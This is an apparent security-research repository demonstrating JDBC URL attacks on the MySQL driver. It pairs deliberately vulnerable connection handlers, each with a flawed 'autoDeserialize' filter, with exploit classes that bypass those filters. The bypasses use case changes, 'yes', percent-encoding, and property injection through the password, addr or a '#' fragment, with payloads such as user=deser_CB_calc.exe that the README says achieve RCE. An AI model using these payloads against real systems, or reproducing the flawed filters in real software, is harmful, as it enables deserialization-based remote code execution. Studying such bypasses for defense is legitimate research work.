Repository: Y4Sec-Team/mysql-jdbc-tricks Branch: master Commit: dfc4f920ef75 Files: 26 Total size: 21.4 KB Directory structure: gitextract_z5ohkhvb/ ├── .gitignore ├── README.md ├── pom.xml └── src/ └── main/ └── java/ └── org/ └── y4sec/ └── team/ ├── app/ │ ├── Application1.java │ ├── Application10.java │ ├── Application2.java │ ├── Application3.java │ ├── Application4.java │ ├── Application5.java │ ├── Application6.java │ ├── Application7.java │ ├── Application8.java │ └── Application9.java └── exploit/ ├── Example1.java ├── Example10.java ├── Example2.java ├── Example3.java ├── Example4.java ├── Example5.java ├── Example6.java ├── Example7.java ├── Example7Bypass.java ├── Example8.java ├── Example8Bypass.java ├── Example9.java └── Example9Bypass.java ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ target/ !.mvn/wrapper/maven-wrapper.jar !**/src/main/**/target/ !**/src/test/**/target/ ### IntelliJ IDEA ### .idea/modules.xml .idea/jarRepositories.xml .idea/compiler.xml .idea/libraries/ *.iws *.iml *.ipr ### Eclipse ### .apt_generated .classpath .factorypath .project .settings .springBeans .sts4-cache ### NetBeans ### /nbproject/private/ /nbbuild/ /dist/ /nbdist/ /.nb-gradle/ build/ !**/src/main/**/build/ !**/src/test/**/build/ ### VS Code ### .vscode/ ### Mac OS ### .DS_Store .idea/ ================================================ FILE: README.md ================================================ ## mysql-jdbc-tricks 这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在 文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng 推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用 ### 基本示例 参考`Application1`和`Example1`代码 这是一个不存在任何过滤的情况,直接执行即可`RCE` ### 大小写绕过 参考`Application1`和`Example1`代码 这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小写不做限制,如果开发者不做大小写限制,将会被轻易绕过 ### YES绕过 
参考`Application3`和`Example3`代码 这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过 ### 编码绕过 参考`Application4`和`Example4`代码 这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过 ### 暂时的安全 参考`Application5`和`Example5`代码 对于这种情况,似乎是安全了,或许有其他的绕过? ### 另一种形式的传参 参考`Application6`和`Example6`代码 这也是`JDBC`攻击很常见的一种情况 ### 额外参数检查绕过 参考`Application7`和`Example7Bypass`代码 限制额外连接参数情况下如何绕过 ### 特殊情况下的#号绕过 参考`Application8`和`Example8Bypass`代码 一种特殊情况的绕过,属于一种逻辑漏洞 ### 另一种特殊场景的绕过 参考`Application9`和`Example9Bypass`代码 另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过 ### 可能安全 参考`Application10`和`Example10`代码 对于这种情况,似乎是安全了,或许有其他的绕过?
================================================ FILE: pom.xml ================================================ 4.0.0 org.y4sec mysql-jdbc-tricks 1.0 8 8 UTF-8 mysql mysql-connector-java 6.0.2 commons-beanutils commons-beanutils 1.9.4
================================================ FILE: src/main/java/org/y4sec/team/app/Application1.java ================================================
package org.y4sec.team.app;

import java.sql.DriverManager;

/**
 * Baseline case (README "基本示例"): the caller-supplied JDBC URL is handed to the driver
 * without any inspection, so every connection property embedded in it is accepted as-is.
 */
public class Application1 {
    public static void connection(String url){
        try {
            Class.forName("com.mysql.cj.jdbc.Driver");
            // No validation of url before it reaches the driver.
            DriverManager.getConnection(url);
        } catch (Exception e) {
            // Broad catch: failures are printed only, never surfaced to the caller.
            e.printStackTrace();
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application10.java ================================================
package org.y4sec.team.app;

import java.sql.DriverManager;

/**
 * README "可能安全": user, password and extra are each passed through {@link #check(String)},
 * and the fully assembled URL is checked once more, so a query smuggled through addr or db
 * (as in Example10) is still caught by the final check(url).
 *
 * NOTE(review): the guard is a case-sensitive substring match on the literal
 * "autoDeserialize"; how the driver normalizes property names is not shown here — confirm
 * before relying on it. A more robust design passes credentials and an allow-listed set of
 * properties to {@code DriverManager.getConnection(url, java.util.Properties)} instead of
 * concatenating caller input into the URL string.
 */
public class Application10 {
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            // addr and db are interpolated unchecked here; they are only covered by check(url) below.
            String url = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder sb = new StringBuilder();
            sb.append("user=");
            sb.append(check(user));
            sb.append("&");
            sb.append("password=");
            sb.append(check(password));
            if (!extra.equals("")) {
                sb.append("&");
                sb.append(check(extra));
            }
            url = url + sb;
            // Second pass over the assembled string; a RuntimeException from check() lands in the
            // catch below, so no connection is attempted on a hit.
            check(url);
            // Prints the full URL, including the password, to stdout.
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Rejects any input containing the substring "autoDeserialize".
     *
     * @param params raw fragment or whole URL to inspect
     * @return params unchanged when it passes
     * @throws RuntimeException when the substring is present
     */
    private static String check(String params) {
        if (params.contains("autoDeserialize")) {
            throw new RuntimeException("you are hacker");
        }
        return params;
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application2.java ================================================
package org.y4sec.team.app;

import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;

/**
 * README "大小写绕过": the query string is parsed by hand and autoDeserialize is rejected
 * only when its value is exactly "true". Example2 shows the same URL with "tRue" passing
 * the check; the README states the driver does not restrict the case of this value.
 */
public class Application2 {
    public static void connection(String url){
        try {
            if(!check(url)) {
                System.out.println("you are hacker");
                return;
            }
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Hand-rolled query parser: splits on "?", "&" and "=" and compares the raw value.
     *
     * @param jdbcUrl full JDBC URL
     * @return false when autoDeserialize=true is found or parsing throws; true otherwise
     */
    private static boolean check(String jdbcUrl){
        try {
            // Raw Map: keys and values are stored as Object.
            Map params = new HashMap<>();
            // Only the segment after the first '?' is inspected; a URL without '?' throws
            // here and is rejected via the catch below.
            String query = jdbcUrl.split("\\?")[1];
            if (query != null) {
                String[] pairs = query.split("&");
                for (String pair : pairs) {
                    String[] keyValue = pair.split("=");
                    String key = keyValue[0];
                    String value = keyValue.length > 1 ? keyValue[1] : "";
                    params.put(key, value);
                }
            }
            System.out.println("Params: " + params);
            for (Map.Entry p: params.entrySet()){
                if (p.getKey().equals("autoDeserialize")) {
                    // Case-sensitive comparison of the undecoded value.
                    if(p.getValue().equals("true")){
                        return false;
                    }
                }
            }
            return true;
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application3.java ================================================
package org.y4sec.team.app;

import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;

/**
 * README "YES绕过": like Application2 but the value is lower-cased before comparison.
 * Only "true" is rejected; Example3 shows "yes" passing, and the README states the driver
 * accepts both true and yes as boolean values.
 */
public class Application3 {
    public static void connection(String url){
        try {
            if(!check(url)) {
                System.out.println("you are hacker");
                return;
            }
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Hand-rolled query parser; rejects autoDeserialize when its lower-cased value is "true".
     *
     * @param jdbcUrl full JDBC URL
     * @return false on a hit or when parsing throws; true otherwise
     */
    private static boolean check(String jdbcUrl){
        try {
            Map params = new HashMap<>();
            // Only the segment after the first '?' is inspected.
            String query = jdbcUrl.split("\\?")[1];
            if (query != null) {
                String[] pairs = query.split("&");
                for (String pair : pairs) {
                    String[] keyValue = pair.split("=");
                    String key = keyValue[0];
                    String value = keyValue.length > 1 ? keyValue[1] : "";
                    params.put(key, value);
                }
            }
            System.out.println("Params: " + params);
            for (Map.Entry p: params.entrySet()){
                if (p.getKey().equals("autoDeserialize")) {
                    // NOTE(review): with a raw Map.Entry, getValue() is typed Object, so this
                    // assignment would not compile as written — confirm the real source uses a
                    // parameterized Map.
                    String value = p.getValue();
                    value = value.toLowerCase();
                    if(value.equals("true")){
                        return false;
                    }
                }
            }
            return true;
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application4.java ================================================
package org.y4sec.team.app;

import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;

/**
 * README "编码绕过": rejects "true" and "yes" (case-insensitively) but compares the raw,
 * still percent-encoded value. Example4 shows an encoded value passing; the README states
 * the driver accepts URL-encoded parameters.
 */
public class Application4 {
    public static void connection(String url) {
        try {
            if (!check(url)) {
                System.out.println("you are hacker");
                return;
            }
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Hand-rolled query parser; no URL decoding is applied before the comparison.
     *
     * @param jdbcUrl full JDBC URL
     * @return false on a hit or when parsing throws; true otherwise
     */
    private static boolean check(String jdbcUrl) {
        try {
            Map params = new HashMap<>();
            // Only the segment after the first '?' is inspected.
            String query = jdbcUrl.split("\\?")[1];
            if (query != null) {
                String[] pairs = query.split("&");
                for (String pair : pairs) {
                    String[] keyValue = pair.split("=");
                    String key = keyValue[0];
                    String value = keyValue.length > 1 ? keyValue[1] : "";
                    params.put(key, value);
                }
            }
            System.out.println("Params: " + params);
            for (Map.Entry p : params.entrySet()) {
                if (p.getKey().equals("autoDeserialize")) {
                    // NOTE(review): raw Map.Entry — getValue() is Object; see Application3.
                    String value = p.getValue();
                    value = value.toLowerCase();
                    // Compared without decoding, so "%74%72%75%65" is not equal to "true" here.
                    if (value.equals("true") || value.equals("yes")) {
                        return false;
                    }
                }
            }
            return true;
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application5.java ================================================
package org.y4sec.team.app;

import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;

/**
 * README "暂时的安全": the URL is parsed with {@link URI} after stripping "jdbc:", and
 * the query is read through {@code URI.getQuery()}, which returns the percent-decoded
 * form. The encoded value used in Example5 is therefore normalized before comparison.
 */
public class Application5 {
    public static void connection(String url) {
        try {
            if (!check(url)) {
                System.out.println("you are hacker");
                return;
            }
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Parses the URL as a {@link URI} and rejects autoDeserialize=true/yes (case-insensitive).
     *
     * @param jdbcUrl full JDBC URL
     * @return false on a hit or when parsing throws; true otherwise
     */
    private static boolean check(String jdbcUrl) {
        try {
            // replace() removes every occurrence of "jdbc:", not only the leading scheme.
            URI uri = new URI(jdbcUrl.replace("jdbc:", ""));
            String host = uri.getHost();
            int port = uri.getPort();
            String path = uri.getPath();
            // Assumes a non-empty path; an empty path would throw and be rejected below.
            String dbname = path.substring(1);
            Map params = new HashMap<>();
            // getQuery() yields the decoded query (getRawQuery() would not).
            String query = uri.getQuery();
            if (query != null) {
                String[] pairs = query.split("&");
                for (String pair : pairs) {
                    String[] keyValue = pair.split("=");
                    String key = keyValue[0];
                    String value = keyValue.length > 1 ? keyValue[1] : "";
                    params.put(key, value);
                }
            }
            // host/port/dbname are computed for printing only; they do not affect the verdict.
            System.out.println("Host: " + host);
            System.out.println("Port: " + port);
            System.out.println("DB Name: " + dbname);
            System.out.println("Params: " + params);
            for (Map.Entry p : params.entrySet()) {
                if (p.getKey().equals("autoDeserialize")) {
                    // NOTE(review): raw Map.Entry — getValue() is Object; see Application3.
                    String value = p.getValue();
                    value = value.toLowerCase();
                    if (value.equals("true") || value.equals("yes")) {
                        return false;
                    }
                }
            }
            return true;
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application6.java ================================================
package org.y4sec.team.app;

import java.net.URLDecoder;
import java.sql.DriverManager;

/**
 * README "另一种形式的传参": the URL is assembled from separate fields (addr, db, user,
 * password, extra) with no validation of any of them; Example6 places connection
 * properties in extra. URLDecoder is imported but not used.
 */
public class Application6 {
    public static void connection(String addr,String user,String db,String password,String extra) {
        try {
            String url = String.format("jdbc:mysql://%s/%s?",addr,db);
            StringBuilder sb = new StringBuilder();
            sb.append("user=");
            sb.append(user);
            sb.append("&");
            sb.append("password=");
            sb.append(password);
            // extra is appended verbatim as additional query text.
            if (!extra.equals("")){
                sb.append("&");
                sb.append(extra);
            }
            url = url + sb;
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application7.java ================================================
package org.y4sec.team.app;

import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;

/**
 * README "额外参数检查绕过": only the extra field is checked; user and password are
 * concatenated into the query unchecked, so a password containing "&amp;key=value" text
 * (Example7Bypass) introduces properties the check never sees.
 */
public class Application7 {
    public static void connection(String addr,String user,String db,String password,String extra) {
        try {
            String url = String.format("jdbc:mysql://%s/%s?",addr,db);
            StringBuilder sb = new StringBuilder();
            sb.append("user=");
            sb.append(user);
            sb.append("&");
            sb.append("password=");
            // password is not escaped; any '&' or '=' it contains becomes query structure.
            sb.append(password);
            if (!check(extra)){
                System.out.println("you are hacker");
                return;
            }
            if (!extra.equals("")){
                sb.append("&");
                sb.append(extra);
            }
            url = url + sb;
            // Prints the full URL, including the password, to stdout.
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Substring check on one fragment only.
     *
     * @param params the extra fragment
     * @return true when "autoDeserialize" does not occur; false on a hit or on an exception
     */
    private static boolean check(String params){
        try {
            return !params.contains("autoDeserialize");
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application8.java ================================================
package org.y4sec.team.app;

import java.sql.DriverManager;

/**
 * README "特殊情况下的#号绕过": same fragment check as Application7, plus a trailing
 * "autoDeserialize=false" appended to the finished URL as an intended override. Whether that
 * suffix is still parsed as a property depends on what the caller-controlled text before it
 * ends with (Example8Bypass ends extra with "#?"), so the override is not a reliable guard.
 */
public class Application8 {
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            String url = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder sb = new StringBuilder();
            sb.append("user=");
            sb.append(user);
            sb.append("&");
            sb.append("password=");
            // password is appended unchecked (see Example8).
            sb.append(password);
            if (!check(extra)) {
                System.out.println("you are hacker");
                return;
            }
            if (!extra.equals("")) {
                sb.append("&");
                sb.append(extra);
            }
            // url still ends with the '?' from the format string at this point, so the first
            // branch is always taken and the literal is glued directly onto the tail of sb;
            // the else branch is unreachable.
            if (url.endsWith("?")) {
                url = url + sb + "autoDeserialize=false";
            } else {
                url = url + sb + "&autoDeserialize=false";
            }
            // Prints the full URL, including the password, to stdout.
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Substring check on one fragment only.
     *
     * @param params the extra fragment
     * @return true when "autoDeserialize" does not occur; false on a hit or on an exception
     */
    private static boolean check(String params) {
        try {
            return !params.contains("autoDeserialize");
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
    }
}
================================================ FILE: src/main/java/org/y4sec/team/app/Application9.java ================================================
package org.y4sec.team.app;

import java.sql.DriverManager;

/**
 * README "另一种特殊场景的绕过": user, password and extra are checked, but addr and db are
 * interpolated into the URL unchecked. Example9Bypass places a path and query inside addr,
 * so the properties appear in the URL before the "/db?" suffix and are never inspected.
 */
public class Application9 {
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            // addr and db bypass check() entirely.
            String url = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder sb = new StringBuilder();
            sb.append("user=");
            sb.append(check(user));
            sb.append("&");
            sb.append("password=");
            sb.append(check(password));
            if (!extra.equals("")) {
                sb.append("&");
                sb.append(check(extra));
            }
            url = url + sb;
            // Prints the full URL, including the password, to stdout.
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception e) {
            // Also catches the RuntimeException thrown by check().
            e.printStackTrace();
        }
    }

    /**
     * Rejects any input containing the substring "autoDeserialize".
     *
     * @param params fragment to inspect
     * @return params unchanged when it passes
     * @throws RuntimeException when the substring is present
     */
    private static String check(String params) {
        if (params.contains("autoDeserialize")) {
            throw new RuntimeException("you are hacker");
        }
        return params;
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example1.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application1;

/** README "基本示例": drives the unchecked Application1 with a fully caller-built URL. */
public class Example1 {
    public static void main(String[] args) {
        String addr = "127.0.0.1:62787";
        String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
        String url = String.format( "jdbc:mysql://%s/test?%s",addr,params);
        Application1.connection(url);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example10.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application10;

/**
 * README "可能安全": the query is smuggled through addr. Application10's final check(url)
 * still sees it in the assembled string and throws, so no connection is attempted.
 */
public class Example10 {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
        String user = "deser_CB_calc.exe";
        String password = "test";
        String db = "test";
        String extra = "";
        Application10.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example2.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application2;

/** README "大小写绕过": first call is rejected by Application2; the second differs only in value case. */
public class Example2 {
    public static void main(String[] args) {
        String addr = "127.0.0.1:62787";
        String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
        String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application2.connection(url);
        addr = "127.0.0.1:62787";
        params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
        url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application2.connection(url);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example3.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application3;

/** README "YES绕过": "tRue" is now rejected by Application3; the second call uses "yes". */
public class Example3 {
    public static void main(String[] args) {
        String addr = "127.0.0.1:62787";
        String params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
        String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application3.connection(url);
        addr = "127.0.0.1:62787";
        params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
        url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application3.connection(url);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example4.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application4;

/** README "编码绕过": "yes" is rejected by Application4; the second call percent-encodes the value. */
public class Example4 {
    public static void main(String[] args) {
        String addr = "127.0.0.1:62787";
        String params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
        String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application4.connection(url);
        addr = "127.0.0.1:62787";
        params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
        url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application4.connection(url);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example5.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application5;

/** README "暂时的安全": the encoded value is decoded by Application5's URI parsing and rejected. */
public class Example5 {
    public static void main(String[] args) {
        String addr = "127.0.0.1:62787";
        String params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
        String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
        Application5.connection(url);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example6.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application6;

/** README "另一种形式的传参": properties are supplied through the unchecked extra field. */
public class Example6 {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787";
        String user = "deser_CB_calc.exe";
        String password = "test";
        String db = "test";
        String extra = "detectCustomCollations=true&autoDeserialize=true";
        Application6.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example7.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application7;

/** Same inputs as Example6 against Application7; extra is rejected by Application7.check. */
public class Example7 {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787";
        String user = "deser_CB_calc.exe";
        String password = "test";
        String db = "test";
        String extra = "detectCustomCollations=true&autoDeserialize=true";
        Application7.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example7Bypass.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application7;

/** README "额外参数检查绕过": the property is moved into password, which Application7 does not check. */
public class Example7Bypass {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787";
        String user = "deser_CB_calc.exe";
        String password = "test&autoDeserialize=true&";
        String db = "test";
        String extra = "detectCustomCollations=true&";
        Application7.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example8.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application8;

/** Example7Bypass inputs against Application8, which appends "autoDeserialize=false" last. */
public class Example8 {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787";
        String user = "deser_CB_calc.exe";
        String password = "test&autoDeserialize=true&";
        String db = "test";
        String extra = "detectCustomCollations=true&";
        Application8.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example8Bypass.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application8;

/** README "特殊情况下的#号绕过": extra ends with "#?", so Application8's appended override follows a '#'. */
public class Example8Bypass {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787";
        String user = "deser_CB_calc.exe";
        String password = "test&autoDeserialize=true";
        String db = "test";
        String extra = "detectCustomCollations=true&#?";
        Application8.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example9.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application9;

/** Example7Bypass inputs against Application9, whose check() now covers password and throws. */
public class Example9 {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787";
        String user = "deser_CB_calc.exe";
        String password = "test&autoDeserialize=true&";
        String db = "test";
        String extra = "detectCustomCollations=true&";
        Application9.connection(addr,user,db,password,extra);
    }
}
================================================ FILE: src/main/java/org/y4sec/team/exploit/Example9Bypass.java ================================================
package org.y4sec.team.exploit;

import org.y4sec.team.app.Application9;

/** README "另一种特殊场景的绕过": the query is carried in addr, which Application9 never checks. */
public class Example9Bypass {
    public static void main(String[] args) {
        // caller-controlled input
        String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
        String user = "deser_CB_calc.exe";
        String password = "test";
        String db = "test";
        String extra = "";
        Application9.connection(addr,user,db,password,extra);
    }
}